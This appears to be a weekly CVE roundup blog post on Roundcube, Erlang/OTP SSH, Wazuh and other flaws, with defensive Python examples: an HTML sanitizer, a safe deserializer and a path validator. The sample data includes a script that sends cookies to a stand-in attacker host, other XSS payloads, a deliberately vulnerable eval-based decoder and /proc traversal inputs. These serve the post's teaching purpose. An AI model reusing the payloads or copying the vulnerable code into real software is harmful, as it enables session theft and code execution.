Here are the CVE updates for the week of June 9th through 15th.
🔴 Critical Severity Vulnerabilities
Roundcube Webmail Cross-Site Scripting Vulnerability (CISA KEV) | CVE-2024-42009
Description:
A cross-site scripting (XSS) vulnerability affects Roundcube Webmail through 1.5.7 and 1.6.x through 1.6.7. The flaw is in the message_body() function of program/actions/mail/show.php, where HTML in an incoming message is not fully sanitized before it is rendered. An attacker sends a crafted email; when the victim opens it in Roundcube, the embedded JavaScript runs in the victim's authenticated webmail session. No interaction beyond viewing the message is required, which is why this older CVE is being exploited in the wild and now sits in CISA's KEV catalog.
Potential Impacts:
- Email Theft: The injected script runs with the victim's session and can read the mailbox.
- Session Hijacking: The script can drive the webmail session as the victim, or exfiltrate tokens that let the attacker do so.
- Account Abuse: Mail can be sent from the victim's account, for example to phish the victim's contacts or to request password resets for other services that deliver to that mailbox.
- Data Exfiltration: Message contents, contacts, and settings can be silently transmitted to an attacker-controlled server.
Mitigation Recommendations:
- Upgrade Immediately: Update to Roundcube 1.5.8 or 1.6.8 (or later); these releases contain the fix.
- Sanitize, Don't Trust: For any component that renders untrusted HTML, use an allow-list sanitizer and escape everything else before it reaches the browser; the patch tightens exactly this step in Roundcube.
- Use CSP Headers: A Content Security Policy that disallows inline scripts and untrusted script sources limits what an injected payload can do. Test it against the Roundcube UI first, since a policy that is too strict can break legitimate application scripts.
- Audit Mail and Session Activity: Watch for messages carrying unusual HTML or script content, and for anomalous account behaviour after a message is opened (unexpected outbound mail, changed settings, logins from new addresses).
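Worked example of the "sanitize, don't trust" recommendation, added here for this post (Roundcube is PHP, and this is not Roundcube's sanitizer): a Python allow-list HTML filter of the kind a webmail body renderer needs. It rebuilds the document from parsed tokens, keeps only a fixed set of tags and attributes, drops script/style content entirely, strips event-handler attributes, and refuses javascript: and other non-web URL schemes in links. The tag and attribute lists and the sample message are constructed for the example.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Allow-list: tags not listed are removed (their text is kept); attributes not
# listed for a tag are dropped. The lists are a constructed example.
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "a", "ul", "ol", "li", "blockquote"}
ALLOWED_ATTRS = {"a": {"href", "title"}}
VOID_TAGS = {"br"}
# Elements whose content is discarded entirely, not just their tags.
DROP_CONTENT_TAGS = {"script", "style", "iframe", "object", "embed"}
SAFE_URL_SCHEMES = {"http", "https", "mailto"}


def _safe_url(value: str) -> bool:
    """Reject javascript:, data:, vbscript: and any other unexpected scheme.
    Control characters are stripped first because browsers ignore them inside
    a scheme ('java\\nscript:' still runs)."""
    cleaned = "".join(ch for ch in value if ord(ch) > 31 and ord(ch) != 127).strip()
    scheme = urlsplit(cleaned).scheme.lower()
    return scheme == "" or scheme in SAFE_URL_SCHEMES


class AllowListSanitizer(HTMLParser):
    """Rebuilds the document from parsed tokens; nothing from the input is
    copied through verbatim, which is the property a sanitizer needs."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._open = []        # stack of emitted, not yet closed tags
        self._skip_depth = 0   # > 0 while inside a dropped-content element

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT_TAGS:
            self._skip_depth += 1
            return
        if self._skip_depth or tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            name = name.lower()
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # event handlers and unknown attributes never survive
            if value is None or (name == "href" and not _safe_url(value)):
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self._open.append(tag)

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT_TAGS:
            self._skip_depth = max(0, self._skip_depth - 1)
            return
        if self._skip_depth or tag not in self._open:
            return
        # Close everything opened after the matching start tag so the
        # output stays well-formed even when the input was not.
        while self._open:
            opened = self._open.pop()
            self.out.append(f"</{opened}>")
            if opened == tag:
                break

    def handle_data(self, data):
        if not self._skip_depth:
            self.out.append(html.escape(data, quote=False))

    def result(self) -> str:
        self.close()
        while self._open:
            self.out.append(f"</{self._open.pop()}>")
        return "".join(self.out)


def sanitize_html(untrusted: str) -> str:
    parser = AllowListSanitizer()
    parser.feed(untrusted)
    return parser.result()


# Constructed message body: handler attribute, script element, javascript:
# link and an <img onerror> payload, next to one legitimate link.
MALICIOUS_MESSAGE = (
    '<p onmouseover="steal()">Invoice attached.'
    '<script>fetch("https://attacker.invalid/?c=" + document.cookie)</script>'
    '<a href="javascript:alert(document.cookie)" title="x">pay now</a>'
    '<a href="https://example.com/pay">pay here</a>'
    '<img src=x onerror="alert(1)"></p>'
)

if __name__ == "__main__":
    print(sanitize_html(MALICIOUS_MESSAGE))
```

The design point is that the sanitizer never passes input through: it re-serializes only what the allow-list admits, so a "desanitization" bug of the kind fixed in Roundcube (content that survives filtering because a later step reintroduces it) has nothing to reintroduce. Comments and declarations are dropped by HTMLParser's defaults.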
Erlang/OTP SSH Server Critical Authentication Bypass (CISA KEV) | CVE-2025-32433
Description:
A critical flaw in the SSH server that ships with Erlang/OTP (the ssh application) allows unauthenticated remote code execution. The server does not enforce SSH message ordering: an attacker with network access to the listening port can send SSH connection-protocol messages (the ones that open channels and request command execution) before authentication has completed, and the server processes them. No valid credentials are needed, and whatever is executed runs with the privileges of the process hosting the SSH server.
Potential Impacts:
- Unauthorized Access: Attackers can perform operations meant for authenticated users.
- Remote Code Execution: Commands run on the target with the privileges of the Erlang node hosting the SSH server.
- Full Takeover: If that node runs as a privileged user, or the SSH server is the device's management plane, exploitation amounts to complete control of the system.
Mitigation Recommendations:
- Apply the Patch Promptly: Upgrade to OTP-27.3.3, OTP-26.2.5.11, or OTP-25.3.2.20 (or later). The Erlang ssh application is also embedded in third-party products, network and telecom equipment in particular, so check vendor advisories for anything that bundles it.
- Limit SSH Exposure: Restrict the Erlang SSH listener to management networks or a VPN with firewall rules; if the SSH server is not needed, do not start the ssh application at all.
- Review Access Logs: Look for connections to the Erlang SSH port from unexpected sources, and for unexpected processes or shells spawned by the user the Erlang node runs as.
Wazuh Server Remote Code Execution via Deserialization (CISA KEV) | CVE-2025-24016
Description:
Wazuh versions 4.4.0 through 4.9.0 contain a critical remote code execution vulnerability. Parameters for the DistributedAPI are serialized as JSON and deserialized by the as_wazuh_object function (framework/wazuh/core/cluster/common.py), which rebuilds Python objects from type information carried inside the JSON and evaluates a class name taken from the payload. Anyone who can reach the API, for example a compromised Wazuh dashboard or another cluster node and, in some configurations, a compromised agent, can send a crafted request and have the server execute arbitrary Python code.
Potential Impacts:
- Code Execution: Malicious users can execute Python code on the server.
- System Compromise: Attackers can gain full control over the Wazuh instance.
- Lateral Movement: In cluster environments, one compromised node can affect the rest.
- Data Breach: Sensitive logs and configurations may be exposed or altered.
Mitigation Recommendations:
- Update Now: Upgrade to Wazuh version 4.9.1 or later.
- Harden API Access: Require authentication for every API call and restrict the API and cluster ports to trusted addresses (the dashboard, cluster nodes, and admin hosts).
- Treat Agents as Untrusted: Limit what an agent host can reach on the server to the enrollment and event ports it needs, so a compromised endpoint cannot talk to the API or cluster directly.
- Monitor Activity: Alert on unusual API calls, on API requests from unexpected sources, and on unexpected child processes of the Wazuh API and cluster services.
- Isolate Nodes: Segment cluster nodes from general networks so that compromise of one node does not give direct access to the rest.
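The bug class behind this advisory, shown in a Python example added for this post (it is not Wazuh's code; the `__type__` and `value` keys and the table of constructors are hypothetical): a JSON object_hook that lets the document name the Python callable used to rebuild an object. The unsafe decoder evaluates that name, so the payload can reach any importable callable; the hardened decoder keeps the same wire format but resolves the name through a closed table and validates each constructor's input, so an unknown tag is an error rather than code. The "malicious" document only calls math.factorial so the demonstration is harmless.

```python
import json
from datetime import datetime

# Hypothetical tag key; the shape mirrors the bug class, not Wazuh's source.
TYPE_KEY = "__type__"


def unsafe_object_hook(dct):
    """Vulnerable shape: the JSON names the Python callable used to rebuild
    the object and eval() obliges, so any expression the attacker writes in
    that slot is executed on the server."""
    if TYPE_KEY in dct:
        return eval(dct[TYPE_KEY])(dct["value"])
    return dct


def _require_str(value):
    if not isinstance(value, str):
        raise ValueError("expected a string value")
    return value


# Hardened shape: a closed table from tag to constructor. The tag is only
# ever used as a dictionary key, and each constructor validates its input.
SAFE_CONSTRUCTORS = {
    "datetime.fromisoformat": lambda v: datetime.fromisoformat(_require_str(v)),
}


def safe_object_hook(dct):
    if TYPE_KEY in dct:
        ctor = SAFE_CONSTRUCTORS.get(dct[TYPE_KEY])
        if ctor is None:
            raise ValueError(f"unknown object tag: {dct[TYPE_KEY]!r}")
        return ctor(dct.get("value"))
    return dct


def decode_unsafe(payload: str):
    return json.loads(payload, object_hook=unsafe_object_hook)


def decode_safe(payload: str):
    return json.loads(payload, object_hook=safe_object_hook)


def safe_rejects(payload: str) -> bool:
    """True if the hardened decoder refuses the document (malformed JSON,
    unknown tag, or a constructor rejecting its input)."""
    try:
        decode_safe(payload)
    except ValueError:
        return True
    return False


# Constructed documents: what a legitimate request carries, and what an
# attacker sends. The same slot would accept any importable callable.
LEGITIMATE = '{"when": {"__type__": "datetime.fromisoformat", "value": "2025-06-09T12:00:00"}}'
MALICIOUS = '{"when": {"__type__": "__import__(\'math\').factorial", "value": 5}}'

if __name__ == "__main__":
    print(decode_unsafe(LEGITIMATE)["when"])   # the datetime the protocol intended
    print(decode_unsafe(MALICIOUS)["when"])    # 120: attacker-chosen code ran
    print(safe_rejects(MALICIOUS))             # True
```

When reviewing your own deserializers, the thing to grep for is any place a string from the wire selects a callable (eval, getattr on a module, importlib, pickle, or a "class name" field); the fix is always the same closed table, and the table should be as short as the protocol allows.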
🟠 High Severity Vulnerabilities
Microsoft Windows WebDAV External Control of File Path (CISA KEV) | CVE-2025-33053
CVE-2025-33053 is an external control of file name or path vulnerability in Microsoft Windows' handling of WebDAV. A crafted file can make Windows resolve a path to an attacker-controlled WebDAV server and execute what it finds there; the in-the-wild exploitation used Internet Shortcut (.url) files. The attack runs over the network and needs no authentication, but it does require the victim to open the crafted file, so it arrives as phishing. Microsoft fixed it in the June 2025 security updates.
Remote Command Execution in Hikvision Wireless Access Points | CVE-2025-39240
Hikvision wireless access points contain a remote command execution flaw caused by insufficient input validation. An attacker who has already authenticated can send specially crafted packets that execute commands with elevated privileges. Because the bug is post-authentication, unique strong credentials and keeping the management interface off untrusted networks reduce exposure until the firmware is updated.
Acer ControlCenter Code Execution via Named Pipe | CVE-2025-5491
Acer ControlCenter creates a Windows named pipe with a misconfigured DACL. Named pipes are reachable over SMB (\\host\pipe\name), so a remote user with only low privileges who can connect to the pipe can have the service execute arbitrary code with SYSTEM privileges.
.NET and Visual Studio Dependency Hijacking | CVE-2025-30399
.NET and Visual Studio are vulnerable to an untrusted search path flaw. When the tooling resolves a dependency, it probes locations an attacker can control before trusted ones; planting a malicious file with the expected name earlier in that search order makes the tooling load it instead of the legitimate one. The attack is most practical where the attacker can write to a location on the search path, such as a network share or a shared working directory.
🟡 Medium Severity Vulnerabilities
Salt Master DoS via Unsanitized File Path | CVE-2025-22242
SaltStack's Salt Master contains a denial-of-service vulnerability. The pub_ret method accepts an unsanitized jid (job ID) and uses it to construct a file path that the master's worker then opens and reads. A Salt job ID is normally a 20-digit timestamp, but nothing in the vulnerable code enforces that; by supplying a jid that references a file that blocks on read, such as a FIFO or an entry under /proc, an attacker can stall the worker process.
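The defensive pattern for this class of bug, as a Python example added for this post (it is not Salt's code; the cache layout, the `.load.p` file name and the function names are hypothetical): validate the job ID against its expected format before it touches a path, confirm the resolved path stays inside the cache directory, and open with O_NONBLOCK and O_NOFOLLOW and check the file type on the open descriptor, so a FIFO, device or /proc entry is refused instead of hanging the worker. The demo builds a temporary cache with one real record and one FIFO.

```python
import os
import re
import stat
import tempfile

# A Salt job ID is a 20-digit timestamp (YYYYMMDDhhmmssffffff). Anything else
# is not a jid and must not reach the filesystem.
JID_RE = re.compile(r"\d{20}")


def job_cache_path_unsafe(cache_dir: str, jid: str) -> str:
    """Constructed illustration of the vulnerable shape: the jid goes into
    the path unchecked. os.path.join discards earlier components when a later
    one is absolute, so '/proc/self/fd/0' becomes the path that gets opened."""
    return os.path.join(cache_dir, "jobs", jid, ".load.p")


def job_cache_path_safe(cache_dir: str, jid: str) -> str:
    """Validate the jid against its expected format, then confirm the
    resolved path is still inside the cache directory."""
    if not JID_RE.fullmatch(jid):
        raise ValueError(f"malformed jid: {jid!r}")
    path = os.path.join(cache_dir, "jobs", jid, ".load.p")
    root = os.path.realpath(cache_dir)
    if os.path.commonpath([root, os.path.realpath(path)]) != root:
        raise ValueError("jid escapes the cache directory")
    return path


def open_regular_file(path: str):
    """Open for reading only if the target is a regular file. O_NONBLOCK makes
    opening a FIFO return immediately instead of waiting for a writer, and
    O_NOFOLLOW refuses a symlink planted at the path; the type check runs on
    the open descriptor, so there is no window in which to swap the file."""
    fd = os.open(path, os.O_RDONLY | os.O_NONBLOCK | os.O_NOFOLLOW)
    try:
        if not stat.S_ISREG(os.fstat(fd).st_mode):
            raise OSError(f"refusing to read non-regular file: {path}")
    except Exception:
        os.close(fd)
        raise
    return os.fdopen(fd, "rb")


def _rejects(fn, *args) -> bool:
    try:
        fn(*args)
    except (ValueError, OSError):
        return True
    return False


def demo() -> dict:
    """Set up a temporary job cache with one real record and one FIFO (a
    file that blocks forever on read) and exercise both lookups."""
    results = {}
    with tempfile.TemporaryDirectory() as cache:
        good_jid = "20250609120000123456"
        fifo_jid = "20250609120000999999"
        for jid in (good_jid, fifo_jid):
            os.makedirs(os.path.join(cache, "jobs", jid))
        with open(os.path.join(cache, "jobs", good_jid, ".load.p"), "wb") as f:
            f.write(b"serialized job load")
        os.mkfifo(os.path.join(cache, "jobs", fifo_jid, ".load.p"))

        with open_regular_file(job_cache_path_safe(cache, good_jid)) as f:
            results["good"] = f.read()
        results["traversal_rejected"] = _rejects(job_cache_path_safe, cache, "../../../proc/self/fd/0")
        results["absolute_rejected"] = _rejects(job_cache_path_safe, cache, "/proc/self/fd/0")
        results["fifo_rejected"] = _rejects(
            lambda c, j: open_regular_file(job_cache_path_safe(c, j)), cache, fifo_jid)
        # The unchecked builder hands back a path outside the cache.
        results["unsafe_path"] = job_cache_path_unsafe(cache, "/proc/self/fd/0")
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The format check alone blocks traversal and absolute paths; the realpath containment check is defence in depth for the day someone relaxes the regex, and the descriptor-level type check is what actually prevents the hang, because a FIFO or /proc pseudo-file can be placed at a perfectly well-formed path by anyone who can write into the cache.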
Stored Cross-Site Scripting in AVEVA PI Connector | CVE-2025-4417
AVEVA PI Connector for CygNet (v1.6.14 and earlier) does not sanitize input in its administration portal. A user who already holds local administrator rights can inject JavaScript that is stored and later executed in the browsers of other users who visit the portal. This stored XSS could lead to stolen credentials, session hijacking, or actions performed on behalf of those users; the requirement that the attacker already be a local administrator is what keeps the severity at medium.